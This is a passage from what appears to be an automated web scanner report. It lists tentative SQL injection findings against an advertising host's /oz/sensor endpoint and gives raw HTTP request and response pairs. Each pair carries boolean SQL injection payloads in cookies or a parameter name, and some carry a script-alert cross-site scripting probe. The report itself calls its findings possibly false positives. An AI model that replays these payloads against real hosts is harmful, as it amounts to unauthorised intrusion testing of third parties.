Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; ruid=154dd07bb6adc1d6f31bfa10^6^1307963581^2915161843; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; cd=false; dq=9|4|5|0; khaos=GOVBRMNC-I-DXQD'%20and%201%3d2--%20; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%262372%3D1%263810%3D1%262374%3D1%264214%3D1; put_1197=3460050161923843111

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 11:27:55 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.23. http://tap.rubiconproject.com/oz/sensor [lm cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The lm cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the lm cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=12&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,linkslist+documentid:136,current+datetime:136,cnbc:118,energy:114,southern:84,billion+cnbc:80,datetime+04:80,union:72,transfer:72,must+click:64,cnbc+welcomes:64,please+respect:64,cnbc+highlights:64,posted+yet:64,cnbc+reserves:64,related+links:64,asia+pacific:56,2011:56,2011+4:48,4+54:48,6+16:48,expiration+datetime:48,special+reports:48,datetime+6:48,16+2011:48,datetime:46,billion:46,transfer+equity:40,datetime+11:40,will+benefit:40,energy+news:40,equity+will:40,union+company:40,04+51:40,burgeoning+u:40,large+midstream:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"'%20and%201%3d1--%20; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=14|4|10|0; rdk=6451/11953; rdk15=0; ses15=11953^3; csi15=3187871.js^2^1308225219^1308225277&3206204.js^1^1308225202^1308225202

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 12:12:16 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 12:12:16 GMT; Path=/
Set-Cookie: dq=18|4|14|0; Expires=Fri, 15-Jun-2012 12:12:16 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=12&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,linkslist+documentid:136,current+datetime:136,cnbc:118,energy:114,southern:84,billion+cnbc:80,datetime+04:80,union:72,transfer:72,must+click:64,cnbc+welcomes:64,please+respect:64,cnbc+highlights:64,posted+yet:64,cnbc+reserves:64,related+links:64,asia+pacific:56,2011:56,2011+4:48,4+54:48,6+16:48,expiration+datetime:48,special+reports:48,datetime+6:48,16+2011:48,datetime:46,billion:46,transfer+equity:40,datetime+11:40,will+benefit:40,energy+news:40,equity+will:40,union+company:40,04+51:40,burgeoning+u:40,large+midstream:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"'%20and%201%3d2--%20; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=14|4|10|0; rdk=6451/11953; rdk15=0; ses15=11953^3; csi15=3187871.js^2^1308225219^1308225277&3206204.js^1^1308225202^1308225202

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 12:12:16 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.24. http://tap.rubiconproject.com/oz/sensor [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=18&k=xss3a34b+script:168,script+7c5fa54ba36cca68:168,script+alert:160,script+script:160,script:126,7c5fa54ba36cca68+cnbc:88,cnbc+search:80,search+results:72,cnbc:66,sponsored+results:64,matching+symbols:64,refine+results:64,7c5fa54ba36cca68:44,xss3a34b:40,alert:40,matching+symbol:32,sponsored+result:32,search+result:32,refine+result:32,cnbc+pro:24,asia+pacific:16,refine:16,cnbc+tv:16,date:16,format:16,last:16,special+reports:16,sponsored:16,matching:16,symbols:16,video:14,days:12,stock+screener:8,ceo+interviews:8,symbol:8,earnings+front:8,special+report:8,markets:8,world+markets:8,member+center:8,&rd=burp&t=xss3a34b%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E7c5fa54ba36cca68+-+CNBC&1%20and%201%3d1--%20=1 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss3a34b%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E7c5fa54ba36cca68&categories=exclude&searchboxinput=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; cd=false; dq=11|4|7|0; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=6451/11953; rdk15=0; ses15=11953^1; csi15=3206204.js^1^1308225202^1308225202

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 12:07:56 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 12:07:56 GMT; Path=/
Set-Cookie: dq=17|4|13|0; Expires=Fri, 15-Jun-2012 12:07:56 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=18&k=xss3a34b+script:168,script+7c5fa54ba36cca68:168,script+alert:160,script+script:160,script:126,7c5fa54ba36cca68+cnbc:88,cnbc+search:80,search+results:72,cnbc:66,sponsored+results:64,matching+symbols:64,refine+results:64,7c5fa54ba36cca68:44,xss3a34b:40,alert:40,matching+symbol:32,sponsored+result:32,search+result:32,refine+result:32,cnbc+pro:24,asia+pacific:16,refine:16,cnbc+tv:16,date:16,format:16,last:16,special+reports:16,sponsored:16,matching:16,symbols:16,video:14,days:12,stock+screener:8,ceo+interviews:8,symbol:8,earnings+front:8,special+report:8,markets:8,world+markets:8,member+center:8,&rd=burp&t=xss3a34b%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E7c5fa54ba36cca68+-+CNBC&1%20and%201%3d2--%20=1 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss3a34b%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E7c5fa54ba36cca68&categories=exclude&searchboxinput=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; cd=false; dq=11|4|7|0; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=6451/11953; rdk15=0; ses15=11953^1; csi15=3206204.js^1^1308225202^1308225202

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 12:07:56 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.25. http://tap.rubiconproject.com/oz/sensor [put_1185 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The put_1185 cookie appears to be vulnerable to SQL injection attacks. The payloads 18111862'%20or%201%3d1--%20 and 18111862'%20or%201%3d2--%20 were each submitted in the put_1185 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=14&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,linkslist+documentid:136,current+datetime:136,cnbc:118,energy:114,union:86,billion+cnbc:80,southern:72,transfer:72,related+links:64,must+click:64,cnbc+reserves:64,please+respect:64,cnbc+highlights:64,cnbc+welcomes:64,posted+yet:64,2011:56,asia+pacific:56,datetime+05:56,special+reports:48,datetime+6:48,expiration+datetime:48,16+2011:48,2011+5:48,05+18:48,5+21:48,6+16:48,datetime:46,billion:46,equity+will:40,19+32:40,energy+news:40,will+benefit:40,will+buy:40,datetime+11:40,burgeoning+u:40,union+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=432589728983648183018111862'%20or%201%3d1--%20; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=18|4|14|0; ses2=11953^2; csi2=3187870.js^2^1308226504^1308226815; rdk=6451/11953; rdk15=0; ses15=11953^7; csi15=3187871.js^5^1308225219^1308226816&3206204.js^2^1308225202^1308225888

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:08:33 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 13:08:33 GMT; Path=/
Set-Cookie: dq=27|4|23|0; Expires=Fri, 15-Jun-2012 13:08:33 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=14&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,linkslist+documentid:136,current+datetime:136,cnbc:118,energy:114,union:86,billion+cnbc:80,southern:72,transfer:72,related+links:64,must+click:64,cnbc+reserves:64,please+respect:64,cnbc+highlights:64,cnbc+welcomes:64,posted+yet:64,2011:56,asia+pacific:56,datetime+05:56,special+reports:48,datetime+6:48,expiration+datetime:48,16+2011:48,2011+5:48,05+18:48,5+21:48,6+16:48,datetime:46,billion:46,equity+will:40,19+32:40,energy+news:40,will+benefit:40,will+buy:40,datetime+11:40,burgeoning+u:40,union+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=432589728983648183018111862'%20or%201%3d2--%20; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=18|4|14|0; ses2=11953^2; csi2=3187870.js^2^1308226504^1308226815; rdk=6451/11953; rdk15=0; ses15=11953^7; csi15=3187871.js^5^1308225219^1308226816&3206204.js^2^1308225202^1308225888

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:08:33 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.26. http://tap.rubiconproject.com/oz/sensor [put_1197 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The put_1197 cookie appears to be vulnerable to SQL injection attacks. The payloads 17119375'%20or%201%3d1--%20 and 17119375'%20or%201%3d2--%20 were each submitted in the put_1197 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=15&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,transfer:72,southern:72,related+links:64,posted+yet:64,cnbc+welcomes:64,cnbc+highlights:64,please+respect:64,cnbc+reserves:64,must+click:64,2011:56,asia+pacific:56,datetime+05:56,6+16:48,2011+5:48,16+2011:48,datetime+6:48,special+reports:48,expiration+datetime:48,billion:46,datetime:46,will+benefit:40,will+buy:40,11+billion:40,equity+will:40,5+30:40,energy+news:40,datetime+11:40,55+16:40,burgeoning+u:40,union+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=346005016192384311117119375'%20or%201%3d1--%20; khaos=GOVBRMNC-I-DXQD; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; cd=false; dq=20|4|16|0; ses2=11953^4; csi2=3187870.js^3^1308226504^1308227440&3183300.js^1^1308227126^1308227126; rdk=6451/11953; ses15=11953^9; csi15=3187871.js^6^1308225219^1308227440&3206204.js^3^1308225202^1308227128

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:11:36 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 13:11:36 GMT; Path=/
Set-Cookie: dq=27|4|23|0; Expires=Fri, 15-Jun-2012 13:11:36 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=15&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,transfer:72,southern:72,related+links:64,posted+yet:64,cnbc+welcomes:64,cnbc+highlights:64,please+respect:64,cnbc+reserves:64,must+click:64,2011:56,asia+pacific:56,datetime+05:56,6+16:48,2011+5:48,16+2011:48,datetime+6:48,special+reports:48,expiration+datetime:48,billion:46,datetime:46,will+benefit:40,will+buy:40,11+billion:40,equity+will:40,5+30:40,energy+news:40,datetime+11:40,55+16:40,burgeoning+u:40,union+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=346005016192384311117119375'%20or%201%3d2--%20; khaos=GOVBRMNC-I-DXQD; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; cd=false; dq=20|4|16|0; ses2=11953^4; csi2=3187870.js^3^1308226504^1308227440&3183300.js^1^1308227126^1308227126; rdk=6451/11953; ses15=11953^9; csi15=3187871.js^6^1308225219^1308227440&3206204.js^3^1308225202^1308227128

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:11:36 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.27. http://tap.rubiconproject.com/oz/sensor [put_1512 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The put_1512 cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the put_1512 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

